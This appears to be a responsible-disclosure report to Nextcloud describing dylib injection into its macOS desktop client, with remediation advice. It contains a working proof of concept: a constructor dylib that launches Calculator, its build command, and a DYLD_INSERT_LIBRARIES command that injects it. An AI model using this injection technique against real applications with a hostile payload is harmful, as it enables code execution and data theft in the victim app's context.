I’ve identified a code injection vulnerability in your macOS desktop client. Any malicious application, running with standard user permissions is able to exploit this vulnerability and execute code in your application’s context.
In order to exploit this vulnerability, a victim has to have a malicious application installed on the device.
To show you the impact I’ve prepared a proof of concept where malicious application without root permissions is able to inject to Nextcloud process and open the calculator.
#include <Foundation/Foundation.h>
__attribute__((constructor)) static void pwn() {
puts("\n\nHELLO FROM THE DYLIB!\n\n");
NSTask *task = [[NSTask alloc] init];
task.launchPath = @"/Applications/Calculator.app/Contents/MacOS/Calculator";
[task launch];
}
gcc -dynamiclib -undefined suppress -flat_namespace malicious.m -o malicious.dylib -compatibility_version 10.10.10 -lobjc -framework Foundation
DYLD_FORCE_FLAT_NAMESPACE=1 DYLD_INSERT_LIBRARIES=./malicious.dylib /Applications/nextcloud.app/Contents/MacOS/nextcloud
Assuming that the desktop client has been compiled using XCode, a developer needs to turn on “Hardened Runtime” capability making sure that Allow DYLD Environment Variables option is turned off. Another way to disallow the DYLD Environement variables is adding a _RESTRICTED segment to the application binary.
Privilege escalation in Keybase using this technique
https://hackerone.com/reports/470003
Apple Docs - Hardened runtime entitlements
https://developer.apple.com/documentation/security/hardened_runtime_entitlements
Code execution in the application’s context. Any sensitive resource that may be accessed via the application may be stolen. Attacker is also able to perform any action that user may perform from the app.